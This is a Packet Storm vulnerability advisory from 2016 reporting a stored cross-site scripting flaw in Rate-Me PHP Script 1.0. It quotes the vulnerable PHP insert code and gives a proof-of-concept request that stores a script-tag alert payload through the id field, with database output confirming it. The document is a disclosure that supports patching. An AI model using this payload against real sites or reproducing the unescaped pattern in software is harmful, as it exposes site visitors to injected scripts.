Rate-Me PHP Script 1.0 Cross Site Scripting

2016-11-13T00:00:00
ID PACKETSTORM:139696
Type packetstorm
Reporter Boumediene Kaddour
Modified 2016-11-13T00:00:00

Description

                                        
                                            `# Exploit Title: Rate-Me PHP Script Persistent Cross Site Scripting  
# Disclosure Date: 11/11/2016  
# Exploit Author: Boumediene KADDOUR a.k.a Sh311c0d3r  
# Version: 1.0  
# Application website: https://www.phpjabbers.com/free-rate-me-script/  
# CVE : N/A  
  
Vulnerability Details:  
=====================  
Rate-me php script suffers from a stored Cross Site Scripting which, An  
attacker can inject JavaScript in the rate section and in particular  
through the id field, where the injected script will be stored on the  
database.  
If a developer creates a webpage where authenticated or non authenticated  
users can see the rate status, The script's triggered and the code's  
executed on the client side.  
  
[+] PoC  
  
Vulnerable Code:  
if ($_REQUEST["do"]=='rate') {  
  
$sql = "INSERT INTO ".$SETTINGS["data_table"]." SET  
date_time=now(),  
  
rate_id='".mysql_real_escape_string($_REQUEST["id"])."',  
  
rating='".mysql_real_escape_string($_REQUEST["rating"])."',  
  
ip_address='".mysql_real_escape_string(get_client_ip())."'";  
  
$sql_result = mysql_query ($sql, $connection ) or die ('request  
"Could not execute SQL query" '.$sql);  
  
echo 'Thank you';  
exit;  
  
}  
  
Payload:  
GET  
/Rate-Me/rate-me.php?do=rate&id=<script>alert("StoredXSS")</script>&rating=1&1478894713054  
HTTP/1.1  
Host: 192.168.43.237  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101  
Firefox/31.0 Iceweasel/31.8.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.43.237/Rate-Me/example-page.html  
Connection: keep-alive  
  
Database output:  
mysql> select * from rateme where id=19;  
+----+-------------------------------------------------+---------+-----------------------------------------+------------------------+  
| id | rate_id | rating |  
date_time | ip_address  
|  
+----  
+------------------------------------------------+---------+------------------------------------------+-----------------------+  
| 19 | <script>alert("StoredXSS")</script> | 1 |  
2016-11-11 15:05:30 | 192.168.43.237 |  
+----+-------------------------------------------------+---------+------------+----------------------------+------------------------+  
1 row in set (0.00 sec)  
  
sh311c0d3r  
`